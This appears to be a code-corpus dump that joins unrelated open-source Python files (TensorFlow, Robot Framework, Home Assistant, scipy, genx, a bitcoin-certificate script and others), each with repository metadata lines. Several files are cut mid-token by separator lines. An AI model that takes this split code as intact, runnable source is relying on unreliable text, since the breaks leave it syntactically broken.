self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
if __name__ == '__main__':
test.main()
|
alexandrul-ci/robotframework
|
src/robot/parsing/populators.py
|
Python
|
apache-2.0
| 8,341
| 0.001079
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from robot.errors import DataError
from robot.model import SuiteNamePatterns
from robot.output import LOGGER
from robot.utils import get_error_message, unic
from .datarow import DataRow
from .tablepopulators import (SettingTablePopulator, VariableTablePopulator,
TestTablePopulator, KeywordTablePopulator,
NullPopulator)
from .htmlreader import HtmlReader
from .tsvreader import TsvReader
from .txtreader import TxtReader
from .restreader import RestReader
READERS = {'html': HtmlReader, 'htm': HtmlReader, 'xhtml': HtmlReader,
'tsv': TsvReader , 'rst': RestReader, 'rest': RestReader,
'txt': TxtReader, 'robot': TxtReader}
# Hook for external tools for altering ${CURDIR} processing
PROCESS_CURDIR = True
class FromFilePopulator(object):
_populators = {'setting': SettingTablePopulator,
'variable': VariableTablePopulator,
'test case': TestTablePopulator,
'keyword': KeywordTablePopulator}
def __init__(self, datafile):
self._datafile = datafile
self._populator = NullPopulator()
self._curdir = self._get_curdir(datafile.directory)
def _get_curdir(self, path):
return path.replace('\\','\\\\') if path else None
def populate(self, path):
LOGGER.info("Parsing file '%s'." % path)
source = self._open(path)
try:
self._get_reader(path).read(source, self)
except:
raise DataError(get_error_message())
finally:
source.close()
def _open(self, path):
if not os.path.isfile(path):
raise DataError("Data source does not exist.")
try:
# IronPython handles BOM incorrectly if not using binary mode:
# https://ironpython.codeplex.com/workitem/34655
return open(path, 'rb')
except:
raise DataError(get_error_message())
def _get_reader(self, path):
extension = os.path.splitext(path.lower())[-1][1:]
try:
return READERS[extension]()
except KeyError:
raise DataError("Unsupported file format '%s'." % extension)
def start_table(self, header):
self._populator.populate()
table = self._datafile.start_table(DataRow(header).all)
self._populator = self._populators[table.
|
type](table) \
if table is not None else NullPopulator()
return bool(self._populator)
def eof(self):
self._populator.populate()
def add(self, row):
if PROCESS_CURDIR and self._curdir:
row = self._replace_curdirs_in(row)
data = DataRow(row)
if data:
self._populator.add(data)
def _replace_curdirs_in(self, row):
return [cell.replace('${
|
CURDIR}', self._curdir) for cell in row]
class FromDirectoryPopulator(object):
ignored_prefixes = ('_', '.')
ignored_dirs = ('CVS',)
def populate(self, path, datadir, include_suites=None,
warn_on_skipped=False, include_extensions=None, recurse=True):
LOGGER.info("Parsing test data directory '%s'" % path)
include_suites = self._get_include_suites(path, include_suites or [])
init_file, children = self._get_children(path, include_extensions,
include_suites)
if init_file:
self._populate_init_file(datadir, init_file)
if recurse:
self._populate_children(datadir, children, include_extensions,
include_suites, warn_on_skipped)
def _populate_init_file(self, datadir, init_file):
datadir.initfile = init_file
try:
FromFilePopulator(datadir).populate(init_file)
except DataError as err:
LOGGER.error(err.message)
def _populate_children(self, datadir, children, include_extensions,
include_suites, warn_on_skipped):
for child in children:
try:
datadir.add_child(child, include_suites, include_extensions,
warn_on_skipped)
except DataError as err:
self._log_failed_parsing("Parsing data source '%s' failed: %s"
% (child, err.message), warn_on_skipped)
def _log_failed_parsing(self, message, warn):
if warn:
LOGGER.warn(message)
else:
LOGGER.info(message)
def _get_include_suites(self, path, incl_suites):
if not isinstance(incl_suites, SuiteNamePatterns):
incl_suites = SuiteNamePatterns(self._create_included_suites(incl_suites))
if not incl_suites:
return incl_suites
# If a directory is included, also all its children should be included.
if self._directory_is_included(path, incl_suites):
return SuiteNamePatterns()
return incl_suites
def _create_included_suites(self, incl_suites):
for suite in incl_suites:
yield suite
while '.' in suite:
suite = suite.split('.', 1)[1]
yield suite
def _directory_is_included(self, path, incl_suites):
name = os.path.basename(os.path.normpath(path))
return self._is_in_included_suites(name, incl_suites)
def _get_children(self, dirpath, incl_extensions, incl_suites):
init_file = None
children = []
for path, is_init_file in self._list_dir(dirpath, incl_extensions,
incl_suites):
if is_init_file:
if not init_file:
init_file = path
else:
LOGGER.error("Ignoring second test suite init file '%s'." % path)
else:
children.append(path)
return init_file, children
def _list_dir(self, dir_path, incl_extensions, incl_suites):
# os.listdir returns Unicode entries when path is Unicode
names = os.listdir(unic(dir_path))
for name in sorted(names, key=lambda item: item.lower()):
name = unic(name) # needed to handle nfc/nfd normalization on OSX
path = os.path.join(dir_path, name)
base, ext = os.path.splitext(name)
ext = ext[1:].lower()
if self._is_init_file(path, base, ext, incl_extensions):
yield path, True
elif self._is_included(path, base, ext, incl_extensions, incl_suites):
yield path, False
else:
LOGGER.info("Ignoring file or directory '%s'." % name)
def _is_init_file(self, path, base, ext, incl_extensions):
return (base.lower() == '__init__' and
self._extension_is_accepted(ext, incl_extensions) and
os.path.isfile(path))
def _extension_is_accepted(self, ext, incl_extensions):
if incl_extensions:
return ext in incl_extensions
return ext in READERS
def _is_included(self, path, base, ext, incl_extensions, incl_suites):
if base.startswith(self.ignored_prefixes):
return False
if os.path.isdir(path):
return base not in self.ignored_dirs or ext
if not self._extension_is_accepted(ext, incl_extensions):
return False
return self._is_in_included_suites(base, incl_suites)
def _is_in_included_suites(self, name, incl_s
|
jawilson/home-assistant
|
tests/components/usb/__init__.py
|
Python
|
apache-2.0
| 753
| 0
|
"""Tests for the USB Discovery integration.
|
"""
from homeassistant.components.usb.models import USBDevice
conbee_device = USBDevice(
device="/dev/cu.usbmodemDE24338801",
vid="1CF1",
pid="0030",
serial_number="DE2433880",
manufacturer="dresden elektronik ingenieurtechnik GmbH",
description="ConBee II",
)
slae_sh_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="10C4",
|
pid="EA60",
serial_number="00_12_4B_00_22_98_88_7F",
manufacturer="Silicon Labs",
description="slae.sh cc2652rb stick - slaesh's iot stuff",
)
electro_lama_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="1A86",
pid="7523",
serial_number=None,
manufacturer=None,
description="USB2.0-Serial",
)
|
iamsteadman/bambu-mail
|
bambu_mail/receivers.py
|
Python
|
apache-2.0
| 217
| 0.036866
|
from bambu_mail.shortcuts import subscribe
def newsletter_op
|
tin
|
(sender, user, **kwargs):
subscribe(
user.email,
list_id = 'signup',
double_optin = False,
send_welcome = False
)
|
titiushko/readthedocs.org
|
readthedocs/doc_builder/constants.py
|
Python
|
mit
| 491
| 0.002037
|
'''Doc build constants'''
from django.conf i
|
mport settings
from django.utils.translation import ugettext_lazy as _
DOCKER_SOCKET = getattr(settings, 'DOCKER_SOCKET', 'unix:///var/run/docker.sock')
DOCKER_VERSION = getattr(settings, 'DOCKER_VERSION', 'auto')
DOCKER_IMAGE = getattr(settings, 'DOCKER_IMAGE', 'rtfd-build')
DOCKER_LI
|
MITS = {'memory': '200m', 'time': 600}
DOCKER_LIMITS.update(getattr(settings, 'DOCKER_LIMITS', {}))
DOCKER_TIMEOUT_EXIT_CODE = 42
DOCKER_OOM_EXIT_CODE = 137
|
nikitanovosibirsk/district42
|
tests/dict/test_dict_keys.py
|
Python
|
mit
| 572
| 0
|
from typing import KeysView
from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_empty_keys():
with given:
sch = schema.dict
|
with when:
res = sch.keys()
with then:
assert res == KeysView([])
def test_dict_keys():
with given:
sch = schema.dict({
"id": schema.int,
"name": schema.str,
optional("email"): schema.str,
})
with when:
res = sch.keys()
with then:
assert res == KeysView(["id",
|
"name", "email"])
|
petrlosa/ella
|
ella/core/south_migrations/0005_auto__add_field_category_content__add_field_category_template.py
|
Python
|
bsd-3-clause
| 11,864
| 0.008092
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Category.content'
db.add_column('core_category', 'content', self.gf('django.db.models.fields.TextField')(default='', blank=True), keep_default=False)
# Adding field 'Category.template'
db.add_column('core_category', 'template', self.gf('django.db.models.fields.CharField')(default='category.html', max_length=100), keep_default=False)
def backwards(self, orm):
# Deleting field 'Category.content'
db.delete_column('core_category', 'content')
# Deleting field 'Category.template'
db.delete_column('core_category', 'template')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.author': {
'Meta': {'object_name': 'Author'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'core.category': {
'Meta': {'unique_together': "(('site', 'tree_path'),)", 'object_name': 'Category'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
|
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tree_parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']", 'null': 'True', 'blank': 'True'}),
'tree_path': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'core.dependency': {
'Meta': {'object_name': 'Dependency'},
'dependent_ct': ('django.db.models.fields.related.ForeignKey', [], {
|
'related_name': "'depends_on_set'", 'to': "orm['contenttypes.ContentType']"}),
'dependent_id': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'target_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dependency_for_set'", 'to': "orm['contenttypes.ContentType']"}),
'target_id': ('django.db.models.fields.IntegerField', [], {})
},
'core.listing': {
'Meta': {'object_name': 'Listing'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']"}),
'commercial': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'publish_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publishable': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Publishable']"})
},
'core.publishable': {
'Meta': {'object_name': 'Publishable'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['core.Author']", 'symmetrical': 'False'}),
'category': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['core.Category']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'photo': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['photos.Photo']", 'null': 'True', 'blank': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(3000, 1, 1, 0, 0, 0, 2)', 'db_index': 'T
|
jamestwebber/scipy
|
scipy/special/tests/test_wrightomega.py
|
Python
|
bsd-3-clause
| 3,616
| 0.000277
|
from __future__ import division, print_function, absolute_import
import pytest
import numpy as np
from numpy.testing import assert_, assert_equal, assert_allclose
import scipy.special as sc
from scipy.special._testutils import assert_func_equal
def test_wrightomega_nan():
pts = [complex(np.nan, 0),
complex(0, np.nan),
complex(np.nan, np.nan),
complex(np.nan, 1),
complex(1, np.nan)]
for p in pts:
res = sc.wrightomega(p)
assert_(np.isnan(res.real))
assert_(np.isnan(res.imag))
def test_wrightomega_inf_branch():
pts = [complex(-np.inf, np.pi/4),
complex(-np.inf, -np.pi/4),
complex(-np.inf, 3*np.pi/4),
complex(-np.inf, -3*np.pi/4)]
expected_results = [complex(0.0, 0.0),
complex(0.0, -0.0),
complex(-0.0, 0.0),
complex(-0.0, -0.0)]
for p, expected in zip(pts, expected_results):
res = sc.wrightomega(p)
# We can't use assert_equal(res, expected) because in older versions of
# numpy, assert_equal doesn't check the sign of the real and imaginary
# parts when comparing complex zeros. It does check the sign when the
# arguments are *real* scalars.
assert_equal(res.real, expected.real)
assert_equal(res.imag, expected.imag)
def test_wrightomega_inf():
pts = [complex(np.inf, 10),
complex(-np.inf, 10),
complex(10, np.inf),
complex(10, -np.inf)]
for p in pts:
assert_equal(sc.wrightomega(p), p)
def test_wrightomega_singular():
pts = [complex(-1.0, np.pi),
complex(-1.0, -np.pi)]
|
for p in pts:
res = sc.wrightomega(p)
assert_equal(res, -1.0)
assert_(np.signbit(res.imag) == False)
@pytest.mark.parametrize('x, desired', [
(-np.inf, 0),
(np.inf, np.inf),
])
def test_wrightomega_real_infinities(x, desired):
assert sc.wrightomega(
|
x) == desired
def test_wrightomega_real_nan():
assert np.isnan(sc.wrightomega(np.nan))
def test_wrightomega_real_series_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = 1e20
x_before_crossover = np.nextafter(crossover, -np.inf)
x_after_crossover = np.nextafter(crossover, np.inf)
# Computed using Mpmath
desired_before_crossover = 99999999999999983569.948
desired_after_crossover = 100000000000000016337.948
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
def test_wrightomega_exp_approximation_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = -50
x_before_crossover = np.nextafter(crossover, np.inf)
x_after_crossover = np.nextafter(crossover, -np.inf)
# Computed using Mpmath
desired_before_crossover = 1.9287498479639314876e-22
desired_after_crossover = 1.9287498479639040784e-22
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
def test_wrightomega_real_versus_complex():
x = np.linspace(-500, 500, 1001)
results = sc.wrightomega(x + 0j).real
assert_func_equal(sc.wrightomega, results, x, atol=0, rtol=1e-14)
|
haozhangphd/genx-py3
|
genx/models/sxrd_mult.py
|
Python
|
gpl-3.0
| 12,753
| 0.008469
|
'''<h1>Library for surface x-ray diffraction simulations of superlattices</h1>
<p> The model is based on Fullertons algorithm for superlattices as
described in Phys. Rev. B vol. 45 p. 9292 (1992).
'''
# Programmed by Matts Bjorck 20091215
import numpy as np
import genx.models.sxrd
from genx.models.utils import f, rho
import time
from genx.models.sxrd import UnitCell, AtomGroup, Instrument, Slab, SymTrans
__pars__ = ['SLSample', 'SLStandard', 'UnitCell', 'Slab', 'AtomGroup',
'Instrument']
class SLSample:
'''Class that models a multilayer sample on top of a
substrate according to Fullertons model as given in
PRB ....
'''
def __init__(self, inst, bulk_slab, superlattice, unitcell,
bulk_sym = []):
self.set_bulk_slab(bulk_slab)
self.set_bulk_sym(bulk_sym)
self.superlattice = superlattice
self.inst = inst
self.set_unit_cell(unitcell)
def set_bulk_slab(self, bulk_slab):
'''Set the bulk unit cell to bulk_slab
'''
if not isinstance(bulk_slab, type(genx.models.sxrd.Slab())):
raise TypeError("The bulk slab has to be a member of"
" class Slab")
self.bulk = bulk_slab
def set_unit_cell(self, unit_cell):
'''Sets the unitcell of the sample
'''
if not isinstance(unit_cell, type(genx.models.sxrd.UnitCell(1.0, 1.0, 1.0))):
raise TypeError("The bulk slab has to be a member"
" of class UnitCell")
if unit_cell == None:
unit_cell = genx.models.sxrd.UnitCell(1.0, 1,.0, 1.0)
self.unit_cell = unit_cell
def set_bulk_sym(self, sym_list):
'''Sets the list of allowed symmetry operations for the bulk
sym_list has to be a list ([]) of symmetry elements from the
class SymTrans
'''
# Type checking
if not isinstance(sym_list, type([])):
raise TypeError("The surface symmetries has to contained"
" in a list")
if sym_list == []:
sym_list = [genx.models.sxrd.SymTrans()]
if min([isinstance(sym, type(genx.models.sxrd.SymTrans())) for
sym in sym_list]) == 0:
raise TypeError("All members in the symmetry list has to"
" be a memeber of class SymTrans")
self.bulk_sym = sym_list
def calc_i(self, h, k, l):
'''Calculate the diffracted intensity from a superlattice.
The diffracted intensity from the superlattice and the substrate
are added. I.e. it is assumed that the films is not coherent with
the substrate.
'''
bulk_i = np.abs(self.calc_fb(h, k, l))**2
sl_i = np.abs(self.superlattice.calc_i(h, k, l))
return (bulk_i + sl_i)*self.inst.inten
def calc_fb(self, h, k, l):
'''Calculate the structure factors from the bulk
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, el, u, oc, c = self.bulk._extract_values()
oc = oc/float(len(self.bulk_sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Calculate the "shape factor" for the CTRs
eff_thick = self.unit_cell.c/np.sin(self.inst.alpha*np.pi/180.0)
alpha = (2.82e-5*self.inst.wavel*eff_thick/self.unit_cell.vol()*
np.sum(f.imag,1))
denom = np.exp(2.0*np.pi*1.0J*l)*np.exp(-alpha) - 1.0
# Delta functions to remove finite size effect in hk plane
delta_funcs=(abs(h - np.round(h)) < 1e-12)*(
abs(k - np.round(k)) < 1e-12)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in self.bulk_sym], 0)
,1)
# Putting it all togheter
fb = f_u/denom*delta_funcs
return fb
class Superlattice:
'''Class that describe a superlattice, can be subclassed
to implement different strain profiles, interdiffusion etc..
'''
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
self.a_slab = a_slab
self.b_slab = b_slab
if a_sym == []:
self.a_sym = [genx.models.sxrd.SymTrans()]
else:
self.a_sym = a_sym
if b_sym == []:
self.b_sym = [genx.models.sxrd.SymTrans()]
else:
self.b_sym = b_sym
self.unit_cell = unit_cell
self.inst = inst
def _extract_slab_values(self, slabs,
|
sym):
'''Extracts the necessary parameters for simulating
a list of stacked slabs
'''
# Extract the parameters we need
# the star in zip(*..
|
. transform the list elements to arguments
xt, yt, zt, elt, ut, oct, ct = list(zip(*[slab._extract_values()
for slab in slabs]))
x = np. r_[xt]
y = np.r_[yt]
# scale and shift the slabs with respect to each other
cn = np.cumsum(np.r_[0, ct])[:-1]
z = np.concatenate([zs*c_s + c_cum
for zs, c_cum, c_s in zip(zt, cn, ct)])
#el = reduce(lambda x,y:x+y, elt)
el = np.r_[elt]
u = np.r_[ut]
oc = np.r_[oct]
#print x,y,z, u
t_lay = sum(ct)
return x, y, z, u, oc, el, t_lay
def calc_fslab(self, slablist, sym, h, k, l):
'''Calculate the structure factors from the bulk
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, u, oc, el, t_lay = self._extract_slab_values(slablist,
sym)
oc = oc/float(len(sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in sym], 0)
,1)
#return f_u, (z.max() - z.min())*np.ones(l.shape)
return f_u, t_lay*np.ones(l.shape)
def calc_fa(self, n, h, k, l):
'''Calculate the strucutre factor for a a layer
n is the thickness of the bilayer in units of slabs'''
pass
def calc_fb(self, n, h, k, l):
'''Calcualte the structure factor for a b layer
n is the thickness of the bilayer in units of slabs'''
pass
def calc_fsl(self, unit_cell, h, k, l):
'''Calculate the strucutre factor for the entire
superlattice.
'''
raise NotImplementedError('calc_fsl has to be implemented in '
'a Superlattices subclass')
class SLStandard(Superlattice):
'''Class that implements a "standard" superlattice, no strain
included.
'''
_pars = {'sigmaa': 1e-12, 'sigmab':1e-12, 'repetitions':2, 'na':2,
'nb': 2,'a': 0.0, 'c':1e-12}
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
Superlattice.__init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = a_sym, b_sym = b_sym)
[self._make_set_func(name, self._pars[name]) for name in
list(self._pars.keys())]
[self._make_get_func(name) for name in list(self._pars.keys())]
def calc_fa(self, n, h, k, l):
f_slab, t_z = self.calc_fslab([self.a_slab]*n, self.a_sym,
h, k, l)
return f_slab, t_z
def calc_fb(self, n, h, k, l):
f_slab, t_z = self.calc_fslab([self.b_slab]*n, self.b_sym,
|
bcpki/bitcoin
|
src/bcert/examples/mk_foo1_static.py
|
Python
|
mit
| 2,934
| 0.023177
|
#!/usr/bin/python
import sys
sys.path.append('..')
from bcert_pb2 import *
import binascii
# fill out a minimal bit
|
coin cert
cert = BitcoinCert()
# first the
|
data part (the part is later signed by the "higher level cert" or "the blockchain")
cert.data.version = '0.1'
cert.data.subjectname = 'Foo Inc.'
email = cert.data.contacts.add()
email.type = email.EMAIL
email.value = '[email protected]'
url = cert.data.contacts.add()
url.type = url.URL
url.value = 'http://www.fooinc.com'
paykey = cert.data.paymentkeys.add()
paykey.usage = paykey.PAYMENT
paykey.algorithm.type = paykey.algorithm.STATIC_BTCADDR # is default anyway
key = paykey.value.append("mrMyF68x19kAc2byGKqR9MLfdAe1t5MPzh")
#key = paykey.value.append("0211b60f23135a806aff2c8f0fbbe620c16ba05a9ca4772735c08a16407f185b34".decode('hex'))
# this is standard in bitcoin ripemd(sha256())
from bitcoin import hash_160
# add signature to cert
#sig = cert.signatures.add()
#sig.algorithm.type = sig.algorithm.BCPKI
#sig.algorithm.version = "0.3"
#sig.value = "foo1" # for signatures of type BCPKI the alias IS the value,
# other types place the signature of BitcoinCertDataToHash(certData) here,
# for BCPKI this hash appears in the blockchain instead
# see how the cert looks
print cert
# serialize it
def CertToAscii(cert):
ser = cert.SerializeToString()
crc = binascii.crc32(ser) & 0xffffff # keep only last 24 bit (should use CRC-24 like OpenPGP)
# OpenPGP uses initializations for its crc-24, see http://tools.ietf.org/html/rfc2440
asc = binascii.b2a_base64(cert.SerializeToString())[:-1] # without trailing newline
asc += '=' # checksum is seperated by =
asc += binascii.b2a_base64(('%06x'%crc).decode('hex'))
return asc
def CertToAsciiMsg(cert):
ver = cert.version
asc = CertToAscii(cert)
res = '-----BEGIN BTCPKI CERTIFICATE-----\n'
res += 'Version: '+cert.version+'\n\n'
res += '\n'.join(asc[i:i+72] for i in xrange(0, len(asc), 72))
res += '-----END BTCPKI CERTIFICATE-----\n'
return res
# TODO: AsciiToCert
from e import derivepubkey
#print "deriving filename from: "+normalized
#fname = id+'.bcrt'
fname = 'foo1_static.bcrt'
f=open(fname,'wb')
f.write(cert.SerializeToString())
f.close()
print "binary cert written to: "+fname
#fname = id+'.acrt'
#f=open(fname,'wb')
#f.write(CertToAscii(cert))
#f.close()
#print "ascii cert written to: "+fname
#fname = 'my.data'
#f=open(fname,'wb')
#f.write(cert.data.SerializeToString())
#f.close()
#print "binary data part written to: "+fname
# see the hash
print "hash of data part is: "+hash_160(cert.data.SerializeToString()).encode('hex')
print "hex binary cert: "+cert.SerializeToString().encode('hex')
#print CertToAscii(cert)
#print CertToAsciiMsg(cert)
# OLD
#from subprocess import Popen,PIPE,check_call,call
#p = Popen(['./bitcoind','-testnet','registeralias','foo3','0.5',hash],stdout=PIPE)
#result = p.stdout.read()
#print result
|
carlyeks/cassandra-dtest
|
cqlsh_tests/cqlsh_tools.py
|
Python
|
apache-2.0
| 2,124
| 0.001883
|
import csv
im
|
port random
import cassandra
from nose.tools import assert_items_equal
class DummyColorMap(object):
def __getitem__(self, *args):
return ''
def csv_rows(filename, delimiter=None):
"""
Given a filename, opens a csv file and yields it line by line.
"""
reader_opts = {}
if delimiter is not None:
reader_opts['delimiter'] = delimiter
with open(filename, 'rb') as csvfile:
for row in csv.reader(csvfile, **reader_opts):
yield row
def ass
|
ert_csvs_items_equal(filename1, filename2):
with open(filename1, 'r') as x, open(filename2, 'r') as y:
assert_items_equal(list(x.readlines()), list(y.readlines()))
def random_list(gen=None, n=None):
if gen is None:
def gen():
return random.randint(-1000, 1000)
if n is None:
def length():
return random.randint(1, 5)
else:
def length():
return n
return [gen() for _ in range(length())]
def write_rows_to_csv(filename, data):
with open(filename, 'wb') as csvfile:
writer = csv.writer(csvfile)
for row in data:
writer.writerow(row)
csvfile.close
def monkeypatch_driver():
"""
Monkeypatches the `cassandra` driver module in the same way
